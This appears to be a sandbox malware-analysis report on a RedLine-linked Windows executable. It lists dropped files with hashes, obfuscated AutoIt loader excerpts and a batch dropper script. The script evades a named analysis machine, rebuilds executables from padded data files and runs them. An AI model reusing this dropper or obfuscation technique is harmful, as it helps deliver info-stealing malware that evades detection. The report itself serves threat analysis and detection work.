 | JiH0aUfOU6.exe | malicious | Unknown
 | 2YLM6BQ9S3.exe | malicious | RedLine
 | sEOELQpFOB.lnk | malicious | RedLine
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (349), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1273491
                                Entropy (8bit):5.8531936507300255
                                Encrypted:false
                                SSDEEP:12288:4fLLm1/Avlkk94T9vS62LPWIS36vzh4LBLFiuRJbOyiDZg8wE6B5RRLUvu6cGshx:4zhWkmDshcimJbCKSshIo
                                MD5:32DCB1DD2A8F02DCA8EE1731A6B81A92
                                SHA1:C10FA345252FDEF085C9E0380DC1D043D726CDF5
                                SHA-256:7029D559B92849F5ECA6AB3C48C5025ED5AEB898B0FD88CF7816B99AA4359435
                                SHA-512:63927053F5DC05D5D7F0F4F55EFB2562671AFEB0C70259793C2E69CAEE6BCB6A2E1AA7C6061209AC98BDF85BEA02FC17289D6A8B0DB061230F7D09797667FD8F
                                Malicious:false
                                Preview:..Func NfVmVYAcf($prUAQ,$aZRta,$wVaVmpCY,$BNQqYn,$idENekES,$wRROFGy,$ETECeq,$MSPCu,$PqMHSBAF,$PsmjnaL)..Local $IvvtTotdawlceMYkRtiNyEPWrhrPBTqIwHbhzVSmNloDnzgMgjBGeq = 'rHAqGtgOnqBxcgLSVkIZUvknKYdBfazGqRxFTVjxnvKCWZTbCzGcxwVHcedIOMnyHVzDUyZZZgAbMIBKtSZVMYjZVMlRFDFMXEVwGfDvxGcuAbUNAGDVMDaIIzIiVoxcIOAoMArOfDAyCumnSvdZZKZxkjajHcAjjqbLXMqqCPFpehuCUpfnRxcXPyWAiQuUegTCIOAyvdbltPaYuPabywcSEAVRQmSLILuOzEUyIpeBXlTqNYzsnJPqSwXoSJfWbLCzJ'...$NHOgM = 183..$MTEedhcXvM = 69..While ((10333-10332)*10059)..Switch $NHOgM..Case 176....$RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("68#114#105#118#101#71#101#116#83#101#114#105#97#108#40#39#75#65#111#89#106#69#84#70#106#110#118#75#69#103#106#39#41",0)), $NNUhAqlhU = 'tNBONIeZfPrhpxEeykXoUXaMm'..$135 = 134..For $FbkfRAiskKFcWecPLRVkegNSvagCxZoSLoaUHNFdabwgcMNZdkjcYb = 17 To 28..Local $JdUtyAurnKNHFZ = 'umEAJbVYdLjuxOfZQFLGmpprUnYGApBgXVGqpaNQNsDaTzLfpLW'..Local $RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("79#94#117#107#47#56#58#60#48",7))..Next....$NHOgM = $NHOgM + 1..Case 17
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1987072
                                Entropy (8bit):7.999918819366727
                                Encrypted:true
                                SSDEEP:49152:Z1cp8aUBkOQnyTP5fc/xJ0z5YTXVj0XO6rneN:jaUVQnyTPe/vzVIXWN
                                MD5:98FC7547E88B86C0C1217F60ECCAAFD3
                                SHA1:AE847D9D502B4E4C3763D8226D2E36CABD655F8E
                                SHA-256:4FE8F063DB286F721E9F2B95ED8C2E2B5058CE480FBA1C55CD0E8389693789F5
                                SHA-512:7771B8C853AD8823A4DE7CA4F15B22F27E487266F6F40FA41A4EC94DEA4C015FEF053250662F6C7EFCEC96AA40066608E1846F4C76AFDD93B6BB5A7B1A59F210
                                Malicious:false
                                Preview:j....Cz".J.Ncw'K=......<l....,._..H...p.&-.3J....Q.m..5.....?/^......YX.h.a..w..]....S.c.&w...<K,.m.N..:}/+..`CIC...9.^..Q.=.s.....a.ki%.>.#.}......7.S..?..nF.....h..mU.0.0I....v..;.J.........Z./..b........{U.%.......y..5l..[,Xca,.....BRQ...r*1k.='..24K!.....Sn".......~....[.U..I.9...kCU.c.P.v.{3..*..5...;|...........n\......gP......j[l.T.........o...2I....<.4E.....A'.ujH.3VK...?cY.D.C>_3..<.~.e..=[.E..Llr...E.mq.4...`...A.......;q...j....s>dwd.9>.~v.t.#~4t>9............|..$n.\hsO.1.U..Q4.2.,$q.....Rm.f`/=e.Ud5[WjKD.#'...#...U..c%......K...e...z....M&...k.........W.2F.3!..F.-.W.....)ZL..6........T5..L...J.c`@.r...zfS.yG.?kv......S.....&..S........d.....:_........X...6......1.kv.[......ed....C...`9$.......Z@|f..8..{Y+e.O..-.Q.*h5).a.p....K.:|...pE.,W.L...|)......4..6.....a....Y...).P.(w....6.o.r..}...B.L<..0..w)...d~y:...........w ..5..v..b}..#rg_j~.&[l.)..W.t...g....G.)..#c.+...sL........U'',.X...+....K...U.P..|...:...0..3.-
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: in.exe, Detection: malicious
• Filename: in.exe, Detection: malicious
• Filename: KgpiJLs58m.exe, Detection: malicious
• Filename: KgpiJLs58m.exe, Detection: malicious
• Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious
• Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious
• Filename: JiH0aUfOU6.exe, Detection: malicious
• Filename: JiH0aUfOU6.exe, Detection: malicious
• Filename: 2YLM6BQ9S3.exe, Detection: malicious
• Filename: sEOELQpFOB.lnk, Detection: malicious
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (349), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1273491
                                Entropy (8bit):5.8531936507300255
                                Encrypted:false
                                SSDEEP:12288:4fLLm1/Avlkk94T9vS62LPWIS36vzh4LBLFiuRJbOyiDZg8wE6B5RRLUvu6cGshx:4zhWkmDshcimJbCKSshIo
                                MD5:32DCB1DD2A8F02DCA8EE1731A6B81A92
                                SHA1:C10FA345252FDEF085C9E0380DC1D043D726CDF5
                                SHA-256:7029D559B92849F5ECA6AB3C48C5025ED5AEB898B0FD88CF7816B99AA4359435
                                SHA-512:63927053F5DC05D5D7F0F4F55EFB2562671AFEB0C70259793C2E69CAEE6BCB6A2E1AA7C6061209AC98BDF85BEA02FC17289D6A8B0DB061230F7D09797667FD8F
                                Malicious:false
                                Preview:..Func NfVmVYAcf($prUAQ,$aZRta,$wVaVmpCY,$BNQqYn,$idENekES,$wRROFGy,$ETECeq,$MSPCu,$PqMHSBAF,$PsmjnaL)..Local $IvvtTotdawlceMYkRtiNyEPWrhrPBTqIwHbhzVSmNloDnzgMgjBGeq = 'rHAqGtgOnqBxcgLSVkIZUvknKYdBfazGqRxFTVjxnvKCWZTbCzGcxwVHcedIOMnyHVzDUyZZZgAbMIBKtSZVMYjZVMlRFDFMXEVwGfDvxGcuAbUNAGDVMDaIIzIiVoxcIOAoMArOfDAyCumnSvdZZKZxkjajHcAjjqbLXMqqCPFpehuCUpfnRxcXPyWAiQuUegTCIOAyvdbltPaYuPabywcSEAVRQmSLILuOzEUyIpeBXlTqNYzsnJPqSwXoSJfWbLCzJ'...$NHOgM = 183..$MTEedhcXvM = 69..While ((10333-10332)*10059)..Switch $NHOgM..Case 176....$RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("68#114#105#118#101#71#101#116#83#101#114#105#97#108#40#39#75#65#111#89#106#69#84#70#106#110#118#75#69#103#106#39#41",0)), $NNUhAqlhU = 'tNBONIeZfPrhpxEeykXoUXaMm'..$135 = 134..For $FbkfRAiskKFcWecPLRVkegNSvagCxZoSLoaUHNFdabwgcMNZdkjcYb = 17 To 28..Local $JdUtyAurnKNHFZ = 'umEAJbVYdLjuxOfZQFLGmpprUnYGApBgXVGqpaNQNsDaTzLfpLW'..Local $RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("79#94#117#107#47#56#58#60#48",7))..Next....$NHOgM = $NHOgM + 1..Case 17
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (355), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1027550
                                Entropy (8bit):5.84399406272364
                                Encrypted:false
                                SSDEEP:12288:t9fFNLEjDpDJ8eEaoImLXqEdqfix+jTxxxBRMQUw716TKi:rfHEJmLqEdbx+XDl16TKi
                                MD5:D8E8946A635B6E3825E6BF3899C8B8C0
                                SHA1:AEB5CF5BFB1A35B3A5AB7CFBB4DD82B1C3FDE9D8
                                SHA-256:8AECFE0A5F0CE53FD6750CC500D8B1EFD4A8EC1AE88E47669B82890BE3854AA8
                                SHA-512:22EF7299178CB6258692F0696C18695E3A6E3AB670CA442DB2E27771149B0866E18C39F87B9DBA51716703FB5108A98B60449DED544CBF40B7BA34C764E31138
                                Malicious:false
                                Preview:..Func FVlqLdSP($ZWK,$cHWg,$pWEmjEg,$tIakCX,$ZiSRQtwCz)..Local $vncVRTprkqcXvbYNiKNxMfegOtnDozlbCQSTIMBsaTMYLU = 'auhcIhfquviuMcGVSPYcFFtyxpceTDrDUIyvUXCljQLbBFOVMYUpNmQNwiwmRhiCaEjtdpqUhOoOTGEOxmdVJUPxSacMWraZIotWzKFCXZVZdwTxDhtsXjTnORjYOhYpcpyKBHxKUNXJYQtQnqpJZqevgGoBnHOJwLDiVoSWSxbpglAYNcmOtfl'...$gQvOptYjh = 101..$GUPKCsbvMtmK = 89..While ((5589-5588)*5398)..Switch $gQvOptYjh..Case 94....$JLnhpRTZoZzBQtKQ = Execute(ekrSXFezU("79#94#117#107#47#93#88#112#105#75#128#81#122#78#80#128#90#93#75#48",7))..$139 = 155..For $vqiVcuLpsMYGeOtxWsqoGFSJafvzDIGyLmNiLRgFMrSyUaykguUN = 13 To 21..Local $ccCMNOqlkybOS = 'rEWqggoWxbpZwbCpanPKgjarzICVnjpUhvRYtWxQUnqtCOMCHwM'..Local $JLnhpRTZoZzBQtKQ = ekrSXFezU("118#118#88#114#90#78#77#83#111#117#112#110#109#84#77#77#75#128#125#121#96#88#87#113#110#72#77#94#120",7)..Next....$gQvOptYjh = $gQvOptYjh + 1..Case 95....$AlVthwMkfPtGqSQ = Execute(ekrSXFezU("74#89#112#102#42#73#91#109#78#86#101#81#99#106#116#43",2))..$52 = 116..For $euXtWdVqsaEXsqJLZwHtxHaEQTug
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):97282
                                Entropy (8bit):7.9980120985450665
                                Encrypted:true
                                SSDEEP:1536:i3RFYe7C/BBbpjlPOOgYEGuIaIizdyySgVYZpiV776kAsFLj9xdFPLtK8UR:i3ge7KBl5PuYEtIjyogVepiw3sFnrGR
                                MD5:C99F4CB6198E1D977A35815A23E2DB8D
                                SHA1:A86E1808982D231AEC56879E3ADC7435387E8DDF
                                SHA-256:69778B5C9C6EA73A1392518AC831659E4377CDC252449D943D8D27E067CDD47F
                                SHA-512:3EF754557EA9D808FB6F0577341005248C553D14E47500DD2F1B7F655DF9BA3224FCC8D661D409BC51C902457BEE000D22AB4DB0E486ECD530DD92A537261584
                                Malicious:false
                                Preview:.l.......R..Tf|d...q.m..C6....f~T..E.......a}.&9pll."..~I...?..v.....{.9...;.Q...[....`.p.....7..n..kP...fV[.fwA..HW.)..`.F.z!9r.`..(7.LJ.B.wD..G..X...F.@e{ ..l.^N..\...v~$d......(.H.....G.+.Lg.K\i|..8....[..Y)v....+s..'...i.y."...iK.~...1...F......sn2...z.}....n..#.o..r.O..l.G.{....g...7.@.y.Z.R..K(.8...6.......~.9..,g...t..w...1.......M@R._.zZ.K)..>....^/.M....-.g...=...%..9.z......>j..@..$...z.dR@....X.V.i.2...!..&..h.-..\Ip/O&.}.....?g.^.`.h.B..v....|......c.......U.O.....P."~...+..Tf...%.F.Y. ...[h"...v..>V`.]..|....@G{`.\.V.].....C.S!m]..e.-...q.2...BD.Ko..x}zv.G..#.)....u.H'8.....S.L..cCk.......(.h..M..-j)B..4..U[@w.U....`...{..wc8./..lS....<e.j&....X.+.3....x...........)....F..I..\R.=...;.Q......R.P....D..h..p7.t[.r.....?.8...44/.g......X..C...d{.C.S.._-.'.F...0../TY..L.....v...."..>.}i...@;...1..n0.....^..[..X..i..G.x p.......$b.}......4...cO....#vN..s.RZ..Zm ..B.1............Wv..Z.7R..._i.C...'...FP....y.\=..U3...`k.....P.
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):361472
                                Entropy (8bit):7.999543616570439
                                Encrypted:true
                                SSDEEP:6144:STrZVRpJIehzLugXNmiEwlD/9SOjjyAoZK7XrI/g4PxUAshlDaIZYHyjIQmpWz1S:STryedSgXSwlRSOPyAoZK7Mg4P+AshN+
                                MD5:50C2AD1056C3491921514C3D9A8E1EA0
                                SHA1:3326D29C649A3B05C8F09F45F236448876EA30CD
                                SHA-256:052EDA4E7D006E00CE4ACE3337CB907A42BCF5AE0BBFBE2702C4A7B1540FDECE
                                SHA-512:6666CB4F666FB665A55C82FF6C37EEF15432B6F8F02CE02BCEB24614CA8753F39E0885069D75C8B438B89C4A7AEE16810F1DE61F2E7F6DE5B372E8BA22D1A2CD
                                Malicious:false
                                Preview:.Y..HS...Y.?....."...X.;l1.Y..9.k.t.Mk.aS..R.>......%p.......wh...........[!........V.b..."..yf..\h.1z.[o.j:>...\..........$}.......o\..}....r..D.c.0...G;.R}....!9...G.W......e ..he.J=....x....aM..UN..%2O.iz!.8`..R...P.1..c5..=p..f.L.._.-OZ.s.=...q?..|:.....X.n.......9I..V..B.5..u.......!......Nm...1....@.'.4.]q....J..o...JDg...6.V.0]........cerF../.(~.Ey..thEh...P./K.....@..;.Z....q.k~...I..-....[.....$e....?1.....Q9...!rg.Q.E.Y.*..5."..b..s....=*..j...].p_..O'...GSo`.|..:.^s...D.L.....&.6...z..S.p.5u..'...!.....P.t.y...o.....DT&..U..G..'...B[b,!.......z..UML/J..n....+*s.L.....3&....%C..^..A...^d.XP..p&..H..Q...3:...H....}.WV\KO&..1E...?UCs...SX....mw ..M..G"......|....!..W.M..\%......@..S......_o&.4.5.........f...m.t....&x.....^]...>.+.p.<.M...=........".".......7..Uux{.<...Y.I.i^..gO?.....R.e.@... ...\.e.L\..r.....H$.T..M...="........1-.......u.U..'&.......vtC.j.l.......zm'..=....w.0..f.9T.2J.:2..{g...tr.P .L.(5.kVI...{)..Ke.............(.....
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (521), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):874247
                                Entropy (8bit):5.845938060923655
                                Encrypted:false
                                SSDEEP:12288:vQfX7AlWSi++7WQ777U5wv7sDqGdZzsAwMmk+1T:n5zbYT
                                MD5:676BE9E97E242CCAA40DE8C8342F2381
                                SHA1:F25CA9A365927163836213172F300B6E9A09311A
                                SHA-256:5B0198597C3BB1582AD4ED0DB205772BE9E54B5F3363C7449EC1477F0A2C172F
                                SHA-512:3AF0610DCC1C3F8253AF454102047828FD431D137593CD083E50BC34AC20516A6C975F7CADEDB9F910F0120FDD3D35E0E267708042A2C1EDAD04C611314426AB
                                Malicious:false
                                Preview:..Func zsQzlxmFuQcHzpEjECX($TFjYd,$umipzZZ,$dLJus,$oCMsKSF,$ZVadMtOtS,$DOzy,$HeIzYhBVv,$hLrAGGN)..Local $kQejVvkTGCCieDtfwmGMnqWKnaLEkvPO = 'FNRqcnCwIgTryIAcsEgxxwlTsOCLHHlMOUbPhfGwtKQMrHaKkoTRBzSDCXIHVQxqtufkkKoeYhdKknQKcSAnOakxeTjdGYuhdPHWsimAqRTgroaruYjedVjLVUosbScZiezcQUahzZnWnXsUBppIM'...$AvqiIzfJvVob = 178..$EebXGMktXNLMmQ = 61..While ((7021-7020)*6462)..Switch $AvqiIzfJvVob..Case 175....$zeoBmgmbAjaJckOE = Execute(GKHRXxdEq("76_91_114_104_44_75_88_73_72_80_108_81_104_102_126_75_124_91_90_101_45",4))..$120 = 103..For $MqfarxXHPTlQSCRWgkqgvubMGbAzrtFbAxokCafIlUKcgGIKAMiZOfmGC = 8 To 21..Local $qPPSsXFJlUCIZGJ = 'FdZiCflsUaktvkXpmyLQtMjOIruCQXxfkDnkvVVKEbYYLBhYXaoTUSK'..Local $zeoBmgmbAjaJckOE = GKHRXxdEq("107_110_110_112_72_66_88",0)..Next....$AvqiIzfJvVob = $AvqiIzfJvVob + 1..Case 176....$TSMMMElwkGNheiQiF = Execute(GKHRXxdEq("74_89_112_102_42_101_84_114_84_68_78_82_111_102_103_123_80_112_89_86_85_72_104_43",2))..$97 = 87..For $OBxaTFikvvAXWwwQHxjlGEJTHryQpsIewrovAAZiFBiOAgJMkkm
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):893732
                                Entropy (8bit):6.620371362753424
                                Encrypted:false
                                SSDEEP:12288:FpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:FT3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C38DC9E91502C7A7246EB673B8E5DD5C
                                SHA1:530C4B86A19B1BE44C01E9F01DBACB0BCFE3DBD7
                                SHA-256:1F4460B9449882C79E61D643AD9FB9A6D6B27779E3C40ACFBA4DFAE751F7D745
                                SHA-512:2824B6746EA1114E885F0AA11D11AC44113AE991544543D6BCB73BC7D4E84C229EC9223136A633C4B0B8695A0E95CC6B21A5CD88C17FAD4088442DCC2EDACEDD
                                Malicious:false
                                Preview:jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA........................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B....................................................................................................................................................
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (355), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1027550
                                Entropy (8bit):5.84399406272364
                                Encrypted:false
                                SSDEEP:12288:t9fFNLEjDpDJ8eEaoImLXqEdqfix+jTxxxBRMQUw716TKi:rfHEJmLqEdbx+XDl16TKi
                                MD5:D8E8946A635B6E3825E6BF3899C8B8C0
                                SHA1:AEB5CF5BFB1A35B3A5AB7CFBB4DD82B1C3FDE9D8
                                SHA-256:8AECFE0A5F0CE53FD6750CC500D8B1EFD4A8EC1AE88E47669B82890BE3854AA8
                                SHA-512:22EF7299178CB6258692F0696C18695E3A6E3AB670CA442DB2E27771149B0866E18C39F87B9DBA51716703FB5108A98B60449DED544CBF40B7BA34C764E31138
                                Malicious:false
                                Preview:..Func FVlqLdSP($ZWK,$cHWg,$pWEmjEg,$tIakCX,$ZiSRQtwCz)..Local $vncVRTprkqcXvbYNiKNxMfegOtnDozlbCQSTIMBsaTMYLU = 'auhcIhfquviuMcGVSPYcFFtyxpceTDrDUIyvUXCljQLbBFOVMYUpNmQNwiwmRhiCaEjtdpqUhOoOTGEOxmdVJUPxSacMWraZIotWzKFCXZVZdwTxDhtsXjTnORjYOhYpcpyKBHxKUNXJYQtQnqpJZqevgGoBnHOJwLDiVoSWSxbpglAYNcmOtfl'...$gQvOptYjh = 101..$GUPKCsbvMtmK = 89..While ((5589-5588)*5398)..Switch $gQvOptYjh..Case 94....$JLnhpRTZoZzBQtKQ = Execute(ekrSXFezU("79#94#117#107#47#93#88#112#105#75#128#81#122#78#80#128#90#93#75#48",7))..$139 = 155..For $vqiVcuLpsMYGeOtxWsqoGFSJafvzDIGyLmNiLRgFMrSyUaykguUN = 13 To 21..Local $ccCMNOqlkybOS = 'rEWqggoWxbpZwbCpanPKgjarzICVnjpUhvRYtWxQUnqtCOMCHwM'..Local $JLnhpRTZoZzBQtKQ = ekrSXFezU("118#118#88#114#90#78#77#83#111#117#112#110#109#84#77#77#75#128#125#121#96#88#87#113#110#72#77#94#120",7)..Next....$gQvOptYjh = $gQvOptYjh + 1..Case 95....$AlVthwMkfPtGqSQ = Execute(ekrSXFezU("74#89#112#102#42#73#91#109#78#86#101#81#99#106#116#43",2))..$52 = 116..For $euXtWdVqsaEXsqJLZwHtxHaEQTug
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):887
                                Entropy (8bit):5.693418149335726
                                Encrypted:false
                                SSDEEP:24:0qaKlkEa69c5ugSj28H11Ea69c5ugSj012Ea69c5ugSjW5f:PaK2s9c5TUt1s9c5TU012s9c5TUYf
                                MD5:5D6074FE8E2E8ABCD21C10F1501DE567
                                SHA1:7310F114E7A285BD142D4C507153FE2E75A8DAD1
                                SHA-256:06CBDB7E32E9ABFAC14F7B8E2D2F65204E4A088FE816635401D6A704A3EC4178
                                SHA-512:0AEA34C249402009C0074D55AC85972F03AA8E2DA65F7369D14939F6859F0146CD814E1810754E660C2AD8232C40CC4742E974BE3094540D7DD0DE9839160764
                                Malicious:false
                                Preview:Set UZULuYz=%userdomain%..Set GmSTCT=DESKTOP-QO5QU33..if %UZULuYz%==%GmSTCT% exit ..<nul set /p = "MZ" > Inebriarti.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Inebriarti.exe.com"..copy Conoscermi.vstm A..start Inebriarti.exe.com A..<nul set /p = "MZ" > Bonta.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Bonta.exe.com"..copy Nel.vstm m..start Bonta.exe.com m..<nul set /p = "MZ" > Pensiero.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Pensiero.exe.com"..copy Secondo.vstm E..start Pensiero.exe.com E..ping 127.0.0.1 -n 30....
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (521), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):874247
                                Entropy (8bit):5.845938060923655
                                Encrypted:false
                                SSDEEP:12288:vQfX7AlWSi++7WQ777U5wv7sDqGdZzsAwMmk+1T:n5zbYT
                                MD5:676BE9E97E242CCAA40DE8C8342F2381
                                SHA1:F25CA9A365927163836213172F300B6E9A09311A
                                SHA-256:5B0198597C3BB1582AD4ED0DB205772BE9E54B5F3363C7449EC1477F0A2C172F
                                SHA-512:3AF0610DCC1C3F8253AF454102047828FD431D137593CD083E50BC34AC20516A6C975F7CADEDB9F910F0120FDD3D35E0E267708042A2C1EDAD04C611314426AB
                                Malicious:false
                                Preview:..Func zsQzlxmFuQcHzpEjECX($TFjYd,$umipzZZ,$dLJus,$oCMsKSF,$ZVadMtOtS,$DOzy,$HeIzYhBVv,$hLrAGGN)..Local $kQejVvkTGCCieDtfwmGMnqWKnaLEkvPO = 'FNRqcnCwIgTryIAcsEgxxwlTsOCLHHlMOUbPhfGwtKQMrHaKkoTRBzSDCXIHVQxqtufkkKoeYhdKknQKcSAnOakxeTjdGYuhdPHWsimAqRTgroaruYjedVjLVUosbScZiezcQUahzZnWnXsUBppIM'...$AvqiIzfJvVob = 178..$EebXGMktXNLMmQ = 61..While ((7021-7020)*6462)..Switch $AvqiIzfJvVob..Case 175....$zeoBmgmbAjaJckOE = Execute(GKHRXxdEq("76_91_114_104_44_75_88_73_72_80_108_81_104_102_126_75_124_91_90_101_45",4))..$120 = 103..For $MqfarxXHPTlQSCRWgkqgvubMGbAzrtFbAxokCafIlUKcgGIKAMiZOfmGC = 8 To 21..Local $qPPSsXFJlUCIZGJ = 'FdZiCflsUaktvkXpmyLQtMjOIruCQXxfkDnkvVVKEbYYLBhYXaoTUSK'..Local $zeoBmgmbAjaJckOE = GKHRXxdEq("107_110_110_112_72_66_88",0)..Next....$AvqiIzfJvVob = $AvqiIzfJvVob + 1..Case 176....$TSMMMElwkGNheiQiF = Execute(GKHRXxdEq("74_89_112_102_42_101_84_114_84_68_78_82_111_102_103_123_80_112_89_86_85_72_104_43",2))..$97 = 87..For $OBxaTFikvvAXWwwQHxjlGEJTHryQpsIewrovAAZiFBiOAgJMkkm
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.983820693117877
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Tt843YGUx5.exe
                                File size:9'326'758 bytes
                                MD5:0d6bbe5907ca581fec7c452793aa1257
                                SHA1:103b6e60ec864afc723f9fd0f8c29f91a0fcc4c7
                                SHA256:a1734a3cebd107003588c3b860dd235827515439325aa5bd07dbe3e798cd2e48
                                SHA512:3691b3b107f9abd4bbaee89905ab868eade9770db2451fd8ee2e0efaadcd88aef032b36e64029949f184c5646484d3b09fac6741dc5ee68717a5e8275148744a
